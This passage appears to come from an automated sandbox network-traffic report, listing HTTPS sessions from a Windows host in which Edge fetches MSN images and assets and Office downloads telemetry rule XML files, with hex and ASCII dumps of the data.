06 f0 3c d2 5e 64 fb 7d 47 c0 e6 df 57 b4 89 3a 9f 7d 92 82 ca a9 b9 9b db 51 ef 2b a0 fe d3 26 42 25 d3 43 b9 81 86 88 b4 47 5b 6b ec a6 Data Ascii: /!1)(x3%AvtUo$:GK:3h]Go'Y1V$lgYj.my"`LWHTu]{5D}tCbTH2\7p$p}7{8=[(d{}W8MMqd4M<Ic$6.<^d}GW:}Q+&B%CG[k
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 34 73 3c bb 98 0e 00 9b c6 c9 bb 6f ed f4 2e c7 37 aa 20 89 04 87 4c 6e a5 cb 97 16 32 f7 e2 39 2a 73 60 93 14 98 22 6d 77 47 c0 ab ca 7c 52 c6 eb e7 a9 1b e5 95 da fa 31 06 c5 af 04 d9 c7 f0 89 95 0e 3c 85 8f 61 04 fc c3 8e ea d7 6a df 5d e6 a8 73 58 da 60 ff 00 ca 4b 40 03 53 33 2a ae 5c 79 3b 79 6b 88 93 ca 7a d2 08 3f 5b 2b c5 ca 2f 7d eb e4 5d 98 cf 74 9c 8e 89 0e 2d e6 8d 0c cc 4c 8d a6 64 5d 59 70 2d c6 79 e7 43 41 69 92 34 a9 a4 c8 80 4a ac ec 2f 6e 31 92 0b 98 49 04 88 81 1f 11 ee 54 b9 32 39 ae 6b 64 3a 86 08 30 62 e3 4b 9b 8e 29 3c d5 53 ff 00 85 12 0c 04 3c 63 c8 41 24 0a 5c d2 2d 00 9a 60 c6 f0 34 4f 4b 32 8c 65 ac 03 21 ab 99 ce d6 99 0d 88 b1 b0 53 63 cb 8d d9 31 bb d2 6b 9d e9 de a3 00 1a 60 5e e2 0d b5 d6 60 a8 dd 46 1a e9 02 5a 4d c7 30 Data Ascii: 4s<o.7 Ln29s`"mwG\|R1<aj]sX`K@S3\y;ykz?[+/}]t-Ld]Yp-yCAi4J/n1IT29kd:0bK)<S<cA$\-`4OK2e!Sc1k`^`FZM0
2024-11-11 23:06:29 UTC	7952	IN	Data Raw: 82 35 1c 3d b7 48 ec b3 f2 c1 90 4e b1 4e d3 fe 7c 96 09 72 4b 5d b7 c9 77 44 38 f2 3f d5 39 1c e2 1e d6 e9 a8 36 bc f4 30 61 59 1e a5 db a0 f9 84 da e3 43 a7 97 b2 84 ba 87 bc 41 35 8d 76 3e e7 49 4e cc 95 06 07 4c 01 03 7d 4e 81 54 fe 15 50 26 50 67 6a ec 5d c1 04 d4 63 98 89 83 a4 cc 81 a1 b1 9d 55 8f 48 35 d6 02 ce 02 92 7e 66 8e 20 ea e1 a0 91 b2 b2 1d 01 d6 f1 e8 3e ee ae 3b 06 4c 5d b3 df 93 94 38 72 9d 5c 61 dc b0 38 8b 6b 30 34 53 2f 26 d6 f7 a5 f2 24 ac a4 dc de 9e 3f 44 32 90 5c d7 3a a9 9e 60 20 c7 d3 82 87 1e 3c 87 23 0b 07 34 55 ec d8 f7 8b 74 2a 67 e5 73 f3 0d 1c e3 54 b8 c9 26 04 5f 8d a0 2b c3 2b 18 fa c3 c8 a4 11 43 45 e0 08 22 5d 63 57 b1 f8 28 72 71 d9 2b 6a fd 47 bd 15 58 7d 17 35 94 bc 9b b0 34 58 c9 1a b8 41 16 3b 15 7f bb 6e 6c f8 Data Ascii: 5=HNN\|rK]wD8?960aYCA5v>INL}NTP&Pgj]cUH5~f >;L]8r\a8k04S/&$?D2\:` <#4Ut*gsT&_++CE"]cW(rq+jGX}54XA;nl
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: f8 65 ad 2c 9d 0e d9 98 dc d3 91 e3 94 3a 22 f3 3a c0 88 9b 02 0f 45 cb 71 0d 79 73 26 1c 1c 27 70 d7 4d be fa 24 39 1f 55 9d 00 55 a1 e5 8e 80 6e 4c eb d5 6e 16 bf 23 83 1a d2 67 f0 d7 c7 64 92 e2 dc 9b dd 7d 10 ef 6a 2e f6 4c c6 cf 51 ce cb 4c 32 96 37 52 f2 66 67 ac ff 00 2b 68 b3 b7 f5 1b 97 13 da e0 1a 1e 18 4c 81 36 83 22 67 cf d9 54 7e 42 1e 5a 43 29 61 74 16 e8 49 17 8f b8 57 7b 6e f1 9d b6 12 c6 30 b9 f9 0b 89 2f 32 d8 00 4c c4 1b ee 14 cd 4a 9b 5f 77 2a c6 2a 8a b5 84 dd 51 d6 ff 00 61 8f 1b 3b 5c 40 17 3c 92 2e 4e 80 ea 22 ce bd a0 91 e6 a9 76 23 0d 45 af 34 37 d3 87 b4 b9 c6 ab 4c 92 22 36 b7 18 55 b2 65 f5 de d7 ba 91 53 62 da 72 88 1f 4b 23 03 bb 76 0c d5 d4 ed 99 12 3a 49 3a 78 68 b0 50 6b c5 c5 f2 6f a6 f9 65 39 27 2b 54 51 c9 cf 91 ce 6d Data Ascii: e,:":Eqys&'pM$9UUnLn#gd}j.LQL27Rfg+hL6"gT~BZC)atIW{n0/2LJ_w**Qa;\@<.N"v#E47L"6UeSbrK#v:I:xhPkoe9'+TQm
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: c6 5c d7 07 07 58 53 37 1a 1f 05 d2 ed 1e 0f 74 c1 8f 90 b9 b4 3e 64 82 00 3c bd 6f 61 ee b8 dd ef 72 d3 99 e5 ad 73 49 26 a6 bf f5 01 7d ec 3a 0d 96 09 ca 7e 4a af f1 4f f7 34 69 71 be a4 79 35 0e 8d 26 0d e0 80 66 27 42 40 80 61 66 2f 91 a4 83 7d 38 ef f0 d5 49 dd 77 6f 7e 2e df 1b 5a 68 a0 4d 4d 89 73 64 40 31 a0 1e 26 e5 43 8f b8 8c 61 96 a4 6f f5 8d 35 88 5d 15 2e 2b ed d7 6b d0 9a 5d cb c3 18 f9 9a e0 35 2e e0 62 05 fd b5 f7 49 87 11 c9 4b 1c ea 03 8c 4b ae 20 cc 90 06 e9 3d 43 06 06 f7 b6 b6 95 45 cf 71 63 79 ae 63 7b ee 25 42 52 77 9f f8 52 3b 98 fb 4c ce 2d 60 6b a2 aa 4b 8b 48 60 6e 80 98 9f 87 45 b9 31 e6 ee 4d 21 cc 3e 89 10 d8 83 4c 44 58 40 e8 64 fb 23 07 7a d2 48 ca eb bd cd 64 80 22 96 cd c6 83 7d 2c 0e ea cf fb 1c cc c0 1c 70 e5 6d 70 5b Data Ascii: \XS7t>d<oarsI&}:~JO4iqy5&f'B@af/}8Iwo~.ZhMMsd@1&Cao5].+k]5.bIKK =CEqcyc{%BRwR;L-`kKH`nE1M!>LDX@d#zHd"},pmp[
2024-11-11 23:06:29 UTC	7952	IN	Data Raw: d5 56 1c d7 58 88 93 ad cf 13 65 e2 06 2a 5d ff 00 94 79 0e 2b 2f e9 fd c9 3f 23 9b 5a 71 4b 6f 92 e7 c5 25 45 9c 1f db f5 0c 49 f4 cc 71 96 ff 00 95 23 c3 5b 88 4e fe 9d a2 f3 04 c5 bd cf 92 6c 4d 8c 6d 13 24 17 03 d4 c4 c2 67 b0 65 76 06 e8 df e6 ed 9a 06 a7 c8 4a d2 ee 7e b9 f4 46 48 eb 7f b1 6e 46 63 c0 c7 1c 78 dc c1 cd 8f 1d 6d 87 40 74 3a 64 48 03 ad 8e 8b 81 dd 39 ce 21 e6 d5 b8 be da 99 6b 7f 22 bb 9f ec 0e 57 31 85 ed 10 e7 b8 e3 00 c9 0d 2d 14 d4 01 22 60 ee 4b 94 7d 9f 6b 8f bb c8 e0 fa c3 31 92 39 41 3a 03 bc 40 e6 bf 11 65 cf e3 6b c7 e3 52 95 62 ee be 7f b9 bc be e9 52 38 6f 8b 8d 22 64 6e 4c c5 bc d1 8b b6 cb 9b 33 70 c4 38 87 44 98 06 96 93 63 f4 e2 ba bd ef fa ec fd ab 9e f3 4e 46 30 87 97 35 df ae 20 45 9c 48 9b c0 f8 28 bb 6e e0 b3 b8 Data Ascii: VXe*]y+/?#ZqKo%EIq#[NlMm$gevJ~FHnFcxm@t:dH9!k"W1-"`K}k19A:@ekRbR8o"dnL3p8DcNF05 EH(n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49895	104.117.182.72	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	634	OUT	GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:29 UTC	518	IN	HTTP/1.1 200 OK Last-Modified: Mon, 07 Oct 2024 03:20:56 GMT Access-Control-Allow-Origin: * X-Datacenter: westus X-ActivityId: bcbfda71-25b7-487e-9d5d-89edbe92b8e0 Timing-Allow-Origin: * X-Frame-Options: DENY X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msOP1 X-Source-Length: 93971 Content-Length: 93971 Cache-Control: public, max-age=58585 Expires: Tue, 12 Nov 2024 15:22:54 GMT Date: Mon, 11 Nov 2024 23:06:29 GMT Connection: close
2024-11-11 23:06:29 UTC	15866	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: a4 36 cb df b3 ba c7 b3 04 ed 90 f6 e2 c2 e6 e2 15 12 1c 08 23 50 44 21 50 5e 9a f9 a6 e1 58 88 88 04 75 48 8b 6b 98 b4 55 49 21 35 87 dd 35 26 9a 44 0e 7e 35 49 54 56 24 0a c4 e4 3a d3 25 88 82 73 12 46 2c 8f 29 d5 48 5d 8d c6 6d ee 35 cf db 1b cd 13 3b 65 ce 68 24 82 2e d8 34 30 69 78 42 73 cb ea e3 26 05 79 08 4a a2 ca 49 52 35 6d 63 cb 5c f6 87 76 43 9c 40 9c 23 10 01 c4 8f c4 49 02 4e 65 45 b3 aa 23 1d 30 c2 ef d6 d3 47 11 31 13 3d c0 55 c0 10 0c 29 02 b4 c1 ad 79 db 8a aa 65 6e a9 71 fa 29 25 31 ae 97 e2 b4 2c 69 c5 4d 28 96 43 62 66 0e 29 81 59 31 87 5a 6b 9a bc 6c 6b dc 58 de d3 88 37 17 71 6e 2b 56 04 90 3a 20 95 58 4e 0c 52 db c4 4f 75 a6 70 e9 d5 4b 52 aa 41 6c 45 6f 3e 54 f9 a5 34 8f 1c b8 26 d6 cd c8 02 b5 e4 26 38 d8 2d 03 88 ad 46 87 29 1d Data Ascii: 6#PD!P^XuHkUI!55&D~5ITV$:%sF,)H]m5;eh$.40ixBs&yJIR5mc\vC@#INeE#0G1=U)yenq)%1,iM(Cbf)Y1ZklkX7qn+V: XNROupKRAlEo>T4&&8-F)
2024-11-11 23:06:29 UTC	2689	IN	Data Raw: cc 99 ce ca d2 0c 19 c8 45 ea b3 1d 04 82 d0 6b 50 e2 40 a7 28 77 ba a9 07 3a 4d 94 43 71 18 32 64 d6 b0 78 ac a2 c5 12 20 1e a2 6e d3 71 06 2b 65 9d 79 10 66 b4 f4 e1 6e aa 84 dc 52 d6 14 06 66 2a 6b aa 89 fc a6 bc bd 62 2b d5 05 65 d2 1c 5c 6f d2 f5 d3 45 0d 70 26 b4 eb 68 eb 62 86 58 e8 2e 83 84 10 31 65 26 48 f3 85 27 aa 0b b8 38 bc d2 4b 9c 60 61 10 0f 5b cc 92 2b ce 55 07 46 d9 93 6b 0b c9 b5 81 a4 0e 0b 9b 6c 12 1d 04 d8 d2 40 91 a7 59 d0 23 34 c0 6e 29 70 ac b6 63 3b 50 cd 4f ba 63 2a 21 bb 8e 26 03 45 04 34 90 db 6a e2 7f 95 b0 06 48 37 b4 52 63 50 7a 84 f0 b9 ae 20 c1 ce 41 11 c2 25 ab 0d a9 ac cd a8 01 12 33 e5 09 d3 3c 41 70 b4 35 bd d8 84 d6 86 87 4e a9 b8 b3 07 6f 6b ad 84 09 10 3f d4 4c c9 e8 2b a8 45 a3 59 63 06 7b 64 1f 5a 8f 9a 0e 17 3d Data Ascii: EkP@(w:MCq2dx nq+eyfnRfkb+e\oEp&hbX.1e&H'8K`a[+UFkl@Y#4n)pc;POc!&E4jH7RcPz A%3<Ap5Nok?L+EYc{dZ=
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 14 b8 0f 4e b9 ab 76 28 e7 5a 6b c3 35 0e 0e 1e 95 f4 52 11 c4 48 87 54 92 0d 22 04 d2 49 92 ea 6b a4 28 34 a4 9b da 0f 9f 14 da 70 65 5c f2 a7 8a a4 23 43 32 22 b9 29 63 12 08 10 39 ce a7 4d 07 45 a2 97 32 3c 80 5a 3a 52 4c 4e 7c 8d 13 ec ac 12 22 22 73 f2 b4 75 41 49 34 98 a7 01 3c d1 71 54 b9 b2 09 6f 68 69 23 0d 73 24 54 08 88 9e b2 82 40 8b cf 0f 4b d3 ad 16 98 3d 3a 28 c8 21 25 f5 2e a9 26 4e 66 6a 49 d7 8a ac 2e 74 40 8a c6 84 f9 88 f1 55 4e 3b 8e 2d 71 6b 41 c2 d0 dc 20 32 70 80 2a 03 44 bb fc 8e 66 b2 8b 1b 85 a1 a5 ce 2d 93 86 7f f9 60 dd f8 66 9a 12 42 8f a4 05 a0 07 f7 8e d1 42 29 31 9e 19 b1 d0 d5 63 d9 af 1b 1e 08 bb 90 21 87 00 0d c5 07 ba b5 26 fa 7f 8d 05 ea b1 3f a8 c9 6b 81 6e 17 00 40 23 15 08 c4 1c 2a 30 e5 10 79 27 d0 7a b9 27 92 c4 Data Ascii: Nv(Zk5RHT"Ik(4pe\#C2")c9ME2<Z:RLN\|""suAI4<qTohi#s$T@K=:(!%.&NfjI.t@UN;-qkA 2pDf-`fBB)1c!&?kn@#0y'z'
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 6e 23 e4 b3 a7 1c bb e0 35 97 19 e5 04 71 b9 5e 6c 02 bd 1d d2 37 43 87 22 29 02 f6 f1 2b 91 f4 02 84 00 63 f8 5d ba b9 77 3d a1 86 e0 44 1e 28 db 83 b4 13 e0 20 ec e3 dc 34 6b 9d 11 20 02 6e 60 4c 5a 49 03 9a 37 73 e8 05 8d be 55 95 a7 30 66 20 c1 13 6a 64 8a 48 36 d3 c1 49 c2 8d 65 00 04 9b 00 65 d9 4d c8 11 41 60 67 55 23 6e b1 6e b9 7a 14 b2 23 0c 9b 13 59 cf d1 10 1d 79 75 01 0e 1c c7 12 08 31 40 5a 69 cc 13 06 a8 ed 70 ac d4 47 23 d1 2c 90 dc 6b 36 b7 19 fa f6 df 8c 34 07 38 1c 6c 73 4c e2 61 11 18 aa 08 a8 21 03 0e be 0e 53 d1 74 5e 48 14 a5 6f 1f 75 0e 69 00 45 ef 33 79 e8 b5 19 04 cb 25 a0 83 20 13 4e 30 24 48 ea 85 4f ba 39 6f dc a4 fd bc 39 f7 66 0c 53 dd 68 39 cb 6f 33 e8 b0 ed 24 5e 69 5f e5 18 17 03 42 68 71 37 a3 86 7c d4 ba 93 20 e2 26 a4 Data Ascii: n#5q^l7C")+c]w=D( 4k n`LZI7sU0f jdH6IeeMA`gU#nnz#Yyu1@ZipG#,k648lsLa!St^HouiE3y% N0$HO9o9fSh9o3$^i_Bhq7\| &
2024-11-11 23:06:29 UTC	7952	IN	Data Raw: d6 1d 84 56 26 2d 9f 43 c5 71 b1 df af 67 60 dd 18 48 ac c5 26 3c 59 75 7e ce d0 24 44 45 6e 34 8e 2b ca 79 c8 b6 1d 63 34 f2 1e cb 35 f0 d1 39 5f 2e 0b 18 e9 a7 f1 0f 20 35 c0 c9 b1 5e 46 eb 85 e6 78 7b af 53 71 8e c2 c7 90 40 7b 65 a4 d9 e2 48 91 c4 47 35 e5 6e 06 c7 e3 06 69 5b 5e 64 75 a4 55 6b aa ed 41 80 74 27 82 1b 99 4a 9a e5 4a 55 13 08 26 45 00 3d 68 ba 4f c6 6f 1d cd a7 3b 03 ff 00 4e db b6 58 1c c0 47 eb 38 86 12 22 b1 8c 90 4d 41 88 b2 f4 75 cf 7b 8f 3f 79 7d a6 bc e7 35 b3 35 c3 94 c0 3f 78 cd 22 d1 48 33 23 2c ab 63 d5 14 ed 81 5a 9e a8 a3 6d a4 08 9b d4 88 a0 d2 33 56 8e 35 ca e6 80 75 f4 e0 8c 36 c5 d1 06 db 4c 56 01 35 c8 fd 0a 4e a4 0c 56 14 a4 1b 9b eb cd 1a dc 86 dc 46 18 26 b1 49 89 39 7a a2 3b 6f 03 a2 67 0d ce 40 f3 f6 e6 82 0f 5e Data Ascii: V&-Cqg`H&<Yu~$DEn4+yc459_. 5^Fx{Sq@{eHG5ni[^duUkAt'JJU&E=hOo;NXG8"MAu{?y}55?x"H3#,cZm3V5u6LV5NVF&I9z;og@^
2024-11-11 23:06:29 UTC	16384	IN	Data Raw: 4a 69 a7 9b 1c 49 22 aa 12 59 fc 9f 71 c7 52 92 a2 92 3f 23 53 a5 fa 06 54 22 15 25 1f 94 fe 30 8a 19 45 28 65 6a 7c ba 3f 10 45 0c a2 94 32 b5 f9 47 e3 0c a1 94 42 a4 a7 f2 2f c6 1a 85 65 49 57 33 c1 17 52 55 15 32 b5 c9 70 4a 94 ca 92 53 3b 2e 09 2a 4a 72 a0 94 f2 5c 18 a9 5a 54 ca 79 2e 0c 52 52 5c a4 b9 5a b8 a9 64 32 f5 1f b1 06 75 1d 35 cf fb 02 df b9 a3 31 e6 8b 2f d1 a9 8e 89 4a 57 2b be 25 82 b8 82 03 be 31 83 aa 27 c7 df b7 fa 68 e7 d2 7f aa 7e af 43 10 54 1c bc 7f f7 cc ea 91 f8 e7 64 d3 c5 6b fd bf c9 7d 99 fc df 1c f7 7b ed 2b b7 6d b8 97 c6 3f fe 53 75 8e 22 02 bd bf f9 1f 8c 73 27 f6 96 5f fd 3e 81 72 ef fc 07 cb db df ac ff 00 9f 66 ba ff 00 19 f1 cf 19 da be e8 ec 3a 26 0a f2 be 23 7b 6f 6c c1 7b 47 49 5f 29 bb f1 9f 13 b9 47 6f 3c d2 c5 Data Ascii: JiI"YqR?#ST"%0E(ej\|?E2GB/eIW3RU2pJS;.*Jr\ZTy.RR\Zd2u51/JW+%1'h~CTdk}{+m?Su"s'_>rf:&#{ol{GI_)Go<
2024-11-11 23:06:29 UTC	1928	IN	Data Raw: a9 57 45 92 24 d1 0e b3 4a 2d 88 05 25 c0 73 44 8d 89 10 b2 8f d8 0a c0 f3 e0 ac 1a b5 51 55 18 b4 13 ea b6 37 73 1e e1 04 48 5a 88 12 6a 26 46 99 a8 c5 4d 47 a2 78 8d 74 62 01 6c 7f c7 d1 73 cc 18 3a 66 94 f8 36 f3 57 11 c9 d1 fb 2d d7 87 d9 2c 67 c7 82 82 09 e1 d0 cf b2 d3 cb ff 00 84 ab 8a da 3e 3f 02 16 c4 7c 7d c2 0c f3 f5 09 ce 77 e5 43 e4 ac 5a 36 29 f1 f7 58 1c 8d 34 28 53 9c c8 d0 dd 69 cd b4 e8 8c 3a 34 cb ba 8c c2 41 d2 26 e7 c6 88 77 a8 be 89 82 0b a6 ca c5 aa 92 e1 4e 23 f9 5a 97 b7 9f c9 4c c1 ee 17 cd 31 39 43 86 8a c2 ae b1 3e 47 ee 98 75 32 3d 2a 14 52 68 4b 4e 99 27 7f c8 7f dc 14 96 5d 84 67 c8 d4 2c 6a d0 44 18 50 45 2f 88 7b ad 43 f8 d0 e8 84 bc 41 c2 26 12 26 90 e1 4d 42 52 0d 1c 23 aa d2 e6 8a 59 48 c4 da 8e 1d 52 06 3f c9 be 89 1c Data Ascii: WE$J-%sDQU7sHZj&FMGxtbls:f6W-,g>?\|}wCZ6)X4(Si:4A&wN#ZL19C>Gu2=*RhKN']g,jDPE/{CA&&MBR#YHR?

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.5	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 1c14d510-c01e-0079-05d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230629Z-174f7845968ljs8phC1EWRe6en00000005dg00000000dsx3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	49902	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 4e338e66-401e-0016-6fd5-3353e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230629Z-174f7845968xlwnmhC1EWR0sv800000005e000000000ath3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:29 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 65802b10-501e-000a-61d5-330180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230629Z-174f7845968pf68xhC1EWRr4h800000005u000000000dr1y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:29 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	49905	13.107.246.40	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:29 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
